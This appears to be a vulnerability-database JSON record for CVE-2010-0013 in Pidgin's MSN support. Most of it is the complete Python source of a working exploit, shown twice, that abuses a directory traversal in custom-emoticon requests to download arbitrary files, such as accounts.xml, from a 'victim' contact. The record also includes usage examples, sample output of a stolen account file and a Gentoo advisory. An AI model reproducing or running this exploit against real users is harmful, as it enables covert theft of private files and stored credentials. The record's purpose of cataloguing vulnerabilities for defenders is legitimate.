Using session_id 974948028\r\n\t\tCurrent : 3606, total: 3881 (92%)\r\n\t\t[+] Got an answer from the contact\r\n\t\t----------------\r\n\t\t<?xml version='1.0' encoding='UTF-8' ?>\r\n\r\n\t\t<account version='1.0'>\r\n\t\t........\r\n\"\"\"\r\n\r\n\r\nimport warnings\r\nwarnings.simplefilter(\"ignore\",DeprecationWarning)\r\nimport os\r\nimport sys\r\ntry:\r\n\timport pymsn\r\nexcept ImportError:\r\n\tprint \"Pymsn couldn't be loaded\"\r\n\tprint \"On debian-like systems, the package is python-msn\"\r\n\tsys.exit(-1)\r\nimport gobject\r\nimport logging\r\nimport getpass\r\nimport hashlib\r\nfrom optparse import OptionParser\r\nimport signal\r\nimport time\r\n\r\nSERVER_ADDRESS = 'messenger.hotmail.com'\r\nSERVER_PORT = 1863\r\nFD_OUT = sys.stdout\r\nMAINLOOP = None\r\n# seconds after which, if we didn't get an answer, we quit\r\nTIMEOUT = 5\r\n\r\nglobal_client = None\r\n\r\ndef quit():\r\n\tMAINLOOP.quit()\r\n\tsys.exit(0)\r\n\t\r\n\r\ndef check_if_succeeds():\r\n\t# if False, we didn't get a chunk so we won't get any file, so we quit\r\n\tif global_client.GOT_CONTROL_BLOB == False:\r\n\t\tprint \"[+] Didn't get an answer from the client after %d seconds, it's likely not vulnerable or the file requested doesn't exist/is not accessible\"%TIMEOUT\r\n\t\tprint \"[+] Exiting\"\r\n\t\tglobal_client.quit()\r\n\r\n# called when we get the result data, after our request\r\ndef handle_answer(object, client):\r\n\tprint \"\\n[+] Got an answer from the contact\"\r\n\td = object._data\r\n\tdata = d.read()\r\n\tlength = len(data)\r\n\tFD_OUT.write(data)\r\n\t# if we wrote output to stdout, don't close it\r\n\tif FD_OUT != sys.stdout:\r\n\t\tFD_OUT.close()\r\n\t\tprint \"[+] Wrote %d bytes to file\"%length\r\n\tclient.end = time.time()\r\n\tduration = client.end - client.begin\r\n\tprint \"[+] Download lasted %d seconds at %d bytes/s \"%(duration,(length/duration))\r\n\tclient.quit()\r\n\r\ndef my_on_chunk_recv(transport, chunk):\r\n\tglobal_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk)\r\n\tsession_id = chunk.header.session_id\r\n\tblob_id = chunk.header.blob_id\r\n\tif session_id == global_client.session_id:\r\n\t\t# first blob is control, we \"squeeze\" it and keep only the second one\r\n\t\tif global_client.GOT_CONTROL_BLOB == False:\r\n\t\t\t#print \"Got Control blob in our connection (session_id : %d, blob_id: %d)\"%(session_id, blob_id)\r\n\t\t\tglobal_client.GOT_CONTROL_BLOB = True\r\n\t\telse:\r\n\t\t\t# if connections is complete, session_id is removed from data_blobs so we have to check before accessing it\r\n\t\t\tif global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id):\r\n\t\t\t\tcurrent_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id]\r\n\t\t\t\tprint \"Current : %d, total: %d (%d%%)\\r\"%(current_blob.current_size, current_blob.total_size, ((current_blob.current_size*100)/current_blob.total_size)),\r\n\t\t\t\tsys.stdout.flush()\r\n\r\n\r\ndef error_handler(self, error_type, error):\r\n\t# __on_user_invitation_failed, probably because contact is offline/invisible\r\n\tif error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \\\r\n\terror == pymsn.event.ContactInviteError.NOT_AVAILABLE:\r\n\t\tprint \"[*] ERROR, contact didn't accept our invite, probably because it is disconnected/invisible\"\r\n\t\tquit()\r\n\t# __on_message_undelivered, probably because contact is offline/invisible\r\n\tif error_type == pymsn.event.ConversationErrorType.MESSAGE and \\\r\n\terror == pymsn.event.MessageError.DELIVERY_FAILED:\r\n\t\tprint \"[*] ERROR, couldn't send message, probably because contact is disconnected/invisible\"\r\n\t\tquit()\r\n\tprint \"[*] Unhandled error, error_type : %d , error : %d\"%(error_type, error)\r\n\tquit()\r\n\t\r\nclass MyClient(pymsn.Client):\r\n\tdef __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection):\r\n\t\t# callback to quit\r\n\t\tself.quit = quit\r\n\t\t# victim from whom we request the file\r\n\t\tself.victim = victim\r\n\t\t# just list contacts for this account\r\n\t\tself.list_only = list_only\r\n\t\t# file we request\r\n\t\tself.filename = filename\r\n\t\t# to calculate download duration and speed\r\n\t\tself.begin = 0\r\n\t\tself.end = 0\r\n\t\t# session_id of the connection to retrieve the file\r\n\t\tself.session_id = 0\r\n\t\t# have we already seen the \"control blob\" for this connection\r\n\t\tself.GOT_CONTROL_BLOB = False\r\n\t\tpymsn.Client.__init__(self, server)\r\n\t\t# REALLY REALLY HACKISH\r\n\t\t# if contact is disconnected/invisible, a \"NotImplementedError\" exception is raised\r\n\t\t# and it can't be caught AFAIK so it needs to be redefined here\r\n\t\t# handler_class should be SwitchboardClient\r\n\t\tfor handler_class, extra_args in self._switchboard_manager._handlers_class:\r\n\t\t\thandler_class._on_error = error_handler\r\n\r\n\r\n\r\nclass MyMSNObjectStore(pymsn.p2p.MSNObjectStore):\r\n\tdef __compute_data_hash(self, data):\r\n\t\tdigest = hashlib.sha1()\r\n\t\tdata.seek(0, 0)\r\n\t\tread_data = data.read(1024)\r\n\t\twhile len(read_data) > 0:\r\n\t\t\tdigest.update(read_data)\r\n\t\t\tread_data = data.read(1024)\r\n\t\tdata.seek(0, 0)\r\n\t\treturn digest.digest()\r\n\r\n\t# need to compute the SHA hash (SHAd in MSNObject) otherelse the function in MSNObjectStore complains because\r\n\t# the hash of the data we receive is not the hash we expected (hash we expect is the one we send, which is always the same here)\r\n\tdef _outgoing_session_transfer_completed(self, session, data):\r\n\t\thandle_id, callback, errback, msn_object = self._outgoing_sessions[session] \r\n\t\tmsn_object._data_sha = self.__compute_data_hash(data) \t \r\n\t\tsuper(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data)\r\n\r\nclass ClientEventHandler(pymsn.event.ClientEventInterface):\r\n\t\t\t\r\n\tdef on_client_error(self, error_type, error):\r\n\t\tif error_type == pymsn.event.ClientErrorType.AUTHENTICATION:\r\n\t\t\t print \"[+] Authentication failed, bad login/password\"\r\n\t\t\t self._client.quit()\r\n\t\telse:\r\n\t\t\t print \"[*] ERROR :\", error_type, \" ->\", error\r\n\t\t\t \r\n\tdef on_client_state_changed(self, state):\r\n\t\t#print \"State changed to %s\" % state\r\n\t\tif state == pymsn.client.ClientState.CLOSED:\r\n\t\t\tprint \"[+] Connection to server closed\"\r\n\t\t\tself._client.quit()\r\n \r\n\t\tif state == pymsn.client.ClientState.CONNECTING:\r\n\t\t\tif self.current_state != state:\r\n\t\t\t\tprint \"[+] Connecting to server\"\r\n\t\t\tself.current_state = state\r\n\t\tif state == pymsn.client.ClientState.AUTHENTICATING:\r\n\t\t\tif self.current_state != state:\r\n\t\t\t\tprint \"[+] Authentication in progress\"\r\n\t\t\tself.current_state = state\r\n\t\tif state == pymsn.client.ClientState.SYNCHRONIZING:\r\n\t\t\tif self.current_state != state:\r\n\t\t\t\tprint \"[+] Synchronisation in progress\"\r\n\t\t\tself.current_state = state\r\n\r\n\t\tif state == pymsn.client.ClientState.OPEN:\r\n\t\t\tprint \"[+] OK, all done, ready to proceed\"\r\n\t\t\tself._client.profile.presence = pymsn.Presence.INVISIBLE\r\n\t\t\tcontact_dict = {}\r\n\t\t\tfor i in self._client.address_book.contacts:\r\n\t\t\t\tcontact_dict[i.account] = i\r\n\t\t\tif self._client.list_only:\r\n\t\t\t\tfor (k,v) in contact_dict.items():\r\n\t\t\t\t\tprint k+\" (\"+v.display_name+\")\"\r\n\t\t\t\tself._client.quit()\r\n\t\t\telse:\r\n\t\t\t\tif self._client.victim not in contact_dict.keys():\r\n\t\t\t\t\tprint \"[*] Error, contact %s not in your contact list\"%self._client.victim\r\n\t\t\t\t\tself._client.quit()\r\n\t\t\t\telse: \r\n\t\t\t\t\tcontact = contact_dict[self._client.victim]\r\n\t\t\t\t\tstore = MyMSNObjectStore(self._client)\r\n\t\t\t\t\tobject = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, 'AAA=','2jmj7l5rSw0yVb/vlWAYkK/YBwk=')\r\n\t\t\t\t\tprint \"[+] Sending request for file \\\"%s\\\" to \\\"%s\\\"\"%(self._client.filename, self._client.victim)\r\n\t\t\t\t\tself._client.begin = time.time()\r\n\t\t\t\t\tstore.request(object, [handle_answer, self._client])\r\n\t\t\t\t\t# at this moment, we got only one session_id, the one we will use to request the file\r\n\t\t\t\t\tfor k in store._outgoing_sessions.keys():\r\n\t\t\t\t\t\tprint \"[+] Using session_id %d\"%k._id\r\n\t\t\t\t\t\tself._client.session_id = k._id\r\n\t\t\t\t\t# hack to set up my own callback each time we receive a chunk, used to print the percentage of the download\r\n\t\t\t\t\tself._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received\r\n\t\t\t\t\tself._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv\r\n\t\t\t\t\t# if no file transfer received from the victim after TIMEOUT seconds, quit\r\n\t\t\t\t\tgobject.timeout_add(TIMEOUT*1000, check_if_succeeds)\r\n\r\n\tdef __init__(self, client):\r\n\t\tself.current_state = None\r\n\t\tpymsn.event.ClientEventInterface.__init__(self, client)\r\n\r\n\r\nif __name__ == '__main__':\r\n\tprint \"***********************************************************\\n\"\r\n\tprint \"Pidgin MSN file download vulnerability (CVE-2010-0013)\\n\"\r\n\tprint \"Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\\n\"\r\n\tprint \"***********************************************************\\n\"\r\n\r\n\tusage = \"Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] \"\r\n\tparser = OptionParser(usage=usage)\r\n\tparser.add_option(\"-f\", \"--file\", dest=\"filename\", default=None,\r\n\t\t\t\t\t help=\"File requested to remote contact\")\r\n\tparser.add_option(\"-o\", \"--output\", dest=\"output_file\", default=None,\r\n\t\t\t\t\t help=\"Where to write received file, STDOUT otherelse\")\r\n\tparser.add_option(\"-a\", \"--account\", dest=\"account\", default=None,\r\n\t\t\t\t\t help=\"MSN account to use\")\r\n\tparser.add_option(\"-c\", \"--contact\", dest=\"contact\", default=None,\r\n\t\t\t\t\t help=\"Contact to request file from\")\r\n\tparser.add_option(\"-l\", \"--list\", dest=\"list_only\", action=\"store_true\", default=False,\r\n\t\t\t\t\t help=\"Just print contact list for your account and exit\")\r\n\t\r\n\t(options, args) = parser.parse_args()\r\n\tif not options.filename or not options.account or not options.contact:\r\n\t\tif not (options.account and options.list_only):\r\n\t\t\tprint \"Error, parameter missing\"\r\n\t\t\tparser.print_help()\r\n\t\t\tsys.exit(-1)\r\n\r\n\tif options.output_file != None:\r\n\t\ttry:\r\n\t\t\tFD_OUT = open(options.output_file,\"wb\")\r\n\t\texcept Exception,e:\r\n\t\t\tprint \"Cannot open file %s (%s)\"%(options.output_file, e)\r\n\t\t\tsys.exit(-1)\r\n\r\n\tMAINLOOP = gobject.MainLoop()\r\n\r\n\tdef sigterm_cb():\r\n\t\tgobject.idle_add(quit)\r\n\r\n\tsignal.signal(signal.SIGTERM, sigterm_cb)\r\n\r\n\tlogging.basicConfig(level=logging.CRITICAL) # allows us to see the protocol debug\r\n\tserver = (SERVER_ADDRESS, SERVER_PORT)\r\n\tclient = MyClient(server, quit, options.contact, options.filename, options.list_only)\r\n\tglobal_client = client\r\n\tclient_events_handler = ClientEventHandler(client)\r\n\tprint \"Please enter the password for the account \\\"%s\\\"\"%options.account\r\n\ttry:\r\n\t\tpasswd = getpass.getpass()\r\n\texcept KeyboardInterrupt:\r\n\t\tquit()\r\n\r\n\tlogin_info = (options.account, passwd)\r\n\tclient.login(*login_info)\r\n\ttry:\r\n\t\tMAINLOOP.run()\r\n\texcept KeyboardInterrupt:\r\n\t\tquit()\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/11203/"}], "packetstorm": [{"lastseen": "2016-12-05T22:20:48", "references": [], "edition": 1, "description": "", "reporter": "Mathieu GASPARD", "published": "2010-01-20T00:00:00", "type": "packetstorm", "title": "Pidgin MSN 2.6.4 File Download", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0013"], "modified": "2010-01-20T00:00:00", "href": "https://packetstormsecurity.com/files/85413/Pidgin-MSN-2.6.4-File-Download.html", "id": "PACKETSTORM:85413", "sourceData": "`#!/usr/bin/env python \n\"\"\" \nPidgin MSN <= 2.6.4 file download vulnerability \n \n19 January 2010 \n \nMathieu GASPARD (gaspmat@gmail.com) \n \n \nDescription: \nPidgin is a multi-protocol Instant Messenger. \n \nThis is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi. \nThe issue is caused by an error in the MSN custom smiley feature when processing emoticon requests, \nwhich could allow attackers to disclose the contents of arbitrary files via directory traversal attacks. \n \nAffected versions : \nPidgin <= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library. \nPlugin msn-pecan 0.1.0-rc2 (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to date \n \nPlateforms : \nWindows, Linux, Mac \n \nFix : \nFixed in Pidgin 2.6.5 \nUpdate to the latest version : http://www.pidgin.im/download/ \n \nReferences : \n[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013 \n[2] http://www.pidgin.im/news/security/?id=42 \n \nUsage : \nYou need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn \npython pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l] \n \nExample : \n# python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml] \n \n*********************************************************** \n \nPidgin MSN file download vulnerability (CVE-2010-0013) \n \nUsage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] \n \n*********************************************************** \n \nPlease enter the password for the account \"foo@hotmail.com\" \nPassword: \n[+] Connecting to server \n[+] Authentication in progress \n[+] Synchronisation in progress \n[+] OK, all done, ready to proceed \n[+] Sending request for file \"../accounts.xml\" to \"victim@hotmail.com\" \n[+] Using session_id 974948028 \nCurrent : 3606, total: 3881 (92%) \n[+] Got an answer from the contact \n---------------- \n<?xml version='1.0' encoding='UTF-8' ?> \n \n<account version='1.0'> \n........ \n\"\"\" \n \n \nimport warnings \nwarnings.simplefilter(\"ignore\",DeprecationWarning) \nimport os \nimport sys \ntry: \nimport pymsn \nexcept ImportError: \nprint \"Pymsn couldn't be loaded\" \nprint \"On debian-like systems, the package is python-msn\" \nsys.exit(-1) \nimport gobject \nimport logging \nimport getpass \nimport hashlib \nfrom optparse import OptionParser \nimport signal \nimport time \n \nSERVER_ADDRESS = 'messenger.hotmail.com' \nSERVER_PORT = 1863 \nFD_OUT = sys.stdout \nMAINLOOP = None \n# seconds after which, if we didn't get an answer, we quit \nTIMEOUT = 5 \n \nglobal_client = None \n \ndef quit(): \nMAINLOOP.quit() \nsys.exit(0) \n \n \ndef check_if_succeeds(): \n# if False, we didn't get a chunk so we won't get any file, so we quit \nif global_client.GOT_CONTROL_BLOB == False: \nprint \"[+] Didn't get an answer from the client after %d seconds, it's likely not vulnerable or the file requested doesn't exist/is not accessible\"%TIMEOUT \nprint \"[+] Exiting\" \nglobal_client.quit() \n \n# called when we get the result data, after our request \ndef handle_answer(object, client): \nprint \"\\n[+] Got an answer from the contact\" \nd = object._data \ndata = d.read() \nlength = len(data) \nFD_OUT.write(data) \n# if we wrote output to stdout, don't close it \nif FD_OUT != sys.stdout: \nFD_OUT.close() \nprint \"[+] Wrote %d bytes to file\"%length \nclient.end = time.time() \nduration = client.end - client.begin \nprint \"[+] Download lasted %d seconds at %d bytes/s \"%(duration,(length/duration)) \nclient.quit() \n \ndef my_on_chunk_recv(transport, chunk): \nglobal_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk) \nsession_id = chunk.header.session_id \nblob_id = chunk.header.blob_id \nif session_id == global_client.session_id: \n# first blob is control, we \"squeeze\" it and keep only the second one \nif global_client.GOT_CONTROL_BLOB == False: \n#print \"Got Control blob in our connection (session_id : %d, blob_id: %d)\"%(session_id, blob_id) \nglobal_client.GOT_CONTROL_BLOB = True \nelse: \n# if connections is complete, session_id is removed from data_blobs so we have to check before accessing it \nif global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id): \ncurrent_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id] \nprint \"Current : %d, total: %d (%d%%)\\r\"%(current_blob.current_size, current_blob.total_size, ((current_blob.current_size*100)/current_blob.total_size)), \nsys.stdout.flush() \n \n \ndef error_handler(self, error_type, error): \n# __on_user_invitation_failed, probably because contact is offline/invisible \nif error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \\ \nerror == pymsn.event.ContactInviteError.NOT_AVAILABLE: \nprint \"[*] ERROR, contact didn't accept our invite, probably because it is disconnected/invisible\" \nquit() \n# __on_message_undelivered, probably because contact is offline/invisible \nif error_type == pymsn.event.ConversationErrorType.MESSAGE and \\ \nerror == pymsn.event.MessageError.DELIVERY_FAILED: \nprint \"[*] ERROR, couldn't send message, probably because contact is disconnected/invisible\" \nquit() \nprint \"[*] Unhandled error, error_type : %d , error : %d\"%(error_type, error) \nquit() \n \nclass MyClient(pymsn.Client): \ndef __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection): \n# callback to quit \nself.quit = quit \n# victim from whom we request the file \nself.victim = victim \n# just list contacts for this account \nself.list_only = list_only \n# file we request \nself.filename = filename \n# to calculate download duration and speed \nself.begin = 0 \nself.end = 0 \n# session_id of the connection to retrieve the file \nself.session_id = 0 \n# have we already seen the \"control blob\" for this connection \nself.GOT_CONTROL_BLOB = False \npymsn.Client.__init__(self, server) \n# REALLY REALLY HACKISH \n# if contact is disconnected/invisible, a \"NotImplementedError\" exception is raised \n# and it can't be caught AFAIK so it needs to be redefined here \n# handler_class should be SwitchboardClient \nfor handler_class, extra_args in self._switchboard_manager._handlers_class: \nhandler_class._on_error = error_handler \n \n \n \nclass MyMSNObjectStore(pymsn.p2p.MSNObjectStore): \ndef __compute_data_hash(self, data): \ndigest = hashlib.sha1() \ndata.seek(0, 0) \nread_data = data.read(1024) \nwhile len(read_data) > 0: \ndigest.update(read_data) \nread_data = data.read(1024) \ndata.seek(0, 0) \nreturn digest.digest() \n \n# need to compute the SHA hash (SHAd in MSNObject) otherelse the function in MSNObjectStore complains because \n# the hash of the data we receive is not the hash we expected (hash we expect is the one we send, which is always the same here) \ndef _outgoing_session_transfer_completed(self, session, data): \nhandle_id, callback, errback, msn_object = self._outgoing_sessions[session] \nmsn_object._data_sha = self.__compute_data_hash(data) \nsuper(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data) \n \nclass ClientEventHandler(pymsn.event.ClientEventInterface): \n \ndef on_client_error(self, error_type, error): \nif error_type == pymsn.event.ClientErrorType.AUTHENTICATION: \nprint \"[+] Authentication failed, bad login/password\" \nself._client.quit() \nelse: \nprint \"[*] ERROR :\", error_type, \" ->\", error \n \ndef on_client_state_changed(self, state): \n#print \"State changed to %s\" % state \nif state == pymsn.client.ClientState.CLOSED: \nprint \"[+] Connection to server closed\" \nself._client.quit() \n \nif state == pymsn.client.ClientState.CONNECTING: \nif self.current_state != state: \nprint \"[+] Connecting to server\" \nself.current_state = state \nif state == pymsn.client.ClientState.AUTHENTICATING: \nif self.current_state != state: \nprint \"[+] Authentication in progress\" \nself.current_state = state \nif state == pymsn.client.ClientState.SYNCHRONIZING: \nif self.current_state != state: \nprint \"[+] Synchronisation in progress\" \nself.current_state = state \n \nif state == pymsn.client.ClientState.OPEN: \nprint \"[+] OK, all done, ready to proceed\" \nself._client.profile.presence = pymsn.Presence.INVISIBLE \ncontact_dict = {} \nfor i in self._client.address_book.contacts: \ncontact_dict[i.account] = i \nif self._client.list_only: \nfor (k,v) in contact_dict.items(): \nprint k+\" (\"+v.display_name+\")\" \nself._client.quit() \nelse: \nif self._client.victim not in contact_dict.keys(): \nprint \"[*] Error, contact %s not in your contact list\"%self._client.victim \nself._client.quit() \nelse: \ncontact = contact_dict[self._client.victim] \nstore = MyMSNObjectStore(self._client) \nobject = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, 'AAA=','2jmj7l5rSw0yVb/vlWAYkK/YBwk=') \nprint \"[+] Sending request for file \\\"%s\\\" to \\\"%s\\\"\"%(self._client.filename, self._client.victim) \nself._client.begin = time.time() \nstore.request(object, [handle_answer, self._client]) \n# at this moment, we got only one session_id, the one we will use to request the file \nfor k in store._outgoing_sessions.keys(): \nprint \"[+] Using session_id %d\"%k._id \nself._client.session_id = k._id \n# hack to set up my own callback each time we receive a chunk, used to print the percentage of the download \nself._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received \nself._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv \n# if no file transfer received from the victim after TIMEOUT seconds, quit \ngobject.timeout_add(TIMEOUT*1000, check_if_succeeds) \n \ndef __init__(self, client): \nself.current_state = None \npymsn.event.ClientEventInterface.__init__(self, client) \n \n \nif __name__ == '__main__': \nprint \"***********************************************************\\n\" \nprint \"Pidgin MSN file download vulnerability (CVE-2010-0013)\\n\" \nprint \"Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\\n\" \nprint \"***********************************************************\\n\" \n \nusage = \"Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] \" \nparser = OptionParser(usage=usage) \nparser.add_option(\"-f\", \"--file\", dest=\"filename\", default=None, \nhelp=\"File requested to remote contact\") \nparser.add_option(\"-o\", \"--output\", dest=\"output_file\", default=None, \nhelp=\"Where to write received file, STDOUT otherelse\") \nparser.add_option(\"-a\", \"--account\", dest=\"account\", default=None, \nhelp=\"MSN account to use\") \nparser.add_option(\"-c\", \"--contact\", dest=\"contact\", default=None, \nhelp=\"Contact to request file from\") \nparser.add_option(\"-l\", \"--list\", dest=\"list_only\", action=\"store_true\", default=False, \nhelp=\"Just print contact list for your account and exit\") \n \n(options, args) = parser.parse_args() \nif not options.filename or not options.account or not options.contact: \nif not (options.account and options.list_only): \nprint \"Error, parameter missing\" \nparser.print_help() \nsys.exit(-1) \n \nif options.output_file != None: \ntry: \nFD_OUT = open(options.output_file,\"wb\") \nexcept Exception,e: \nprint \"Cannot open file %s (%s)\"%(options.output_file, e) \nsys.exit(-1) \n \nMAINLOOP = gobject.MainLoop() \n \ndef sigterm_cb(): \ngobject.idle_add(quit) \n \nsignal.signal(signal.SIGTERM, sigterm_cb) \n \nlogging.basicConfig(level=logging.CRITICAL) # allows us to see the protocol debug \nserver = (SERVER_ADDRESS, SERVER_PORT) \nclient = MyClient(server, quit, options.contact, options.filename, options.list_only) \nglobal_client = client \nclient_events_handler = ClientEventHandler(client) \nprint \"Please enter the password for the account \\\"%s\\\"\"%options.account \ntry: \npasswd = getpass.getpass() \nexcept KeyboardInterrupt: \nquit() \n \nlogin_info = (options.account, passwd) \nclient.login(*login_info) \ntry: \nMAINLOOP.run() \nexcept KeyboardInterrupt: \nquit() \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/85413/pidgin_exploit.py.txt"}], "gentoo": [{"lastseen": "2016-09-06T19:46:34", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3594", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2485", "https://bugs.gentoo.org/show_bug.cgi?id=385073", "https://bugs.gentoo.org/show_bug.cgi?id=372785", "https://bugs.gentoo.org/show_bug.cgi?id=299751", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0013"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.10.0-r1", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "net-im/pidgin", "operator": "lt"}], "edition": 1, "description": "### Background\n\nPidgin is an GTK Instant Messenger client.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Pidgin. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nThese vulnerabilities allow for arbitrary file retrieval, Denial of Service and arbitrary code execution with the privileges of the user running Pidgin. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Pidgin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/pidgin-2.10.0-r1\"", "reporter": "Gentoo Foundation", "published": "2012-06-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Pidgin: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3594", "CVE-2011-2485", "CVE-2010-0013"], "modified": "2012-06-21T00:00:00", "id": "GLSA-201206-11", "href": "https://security.gentoo.org/glsa/201206-11", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}}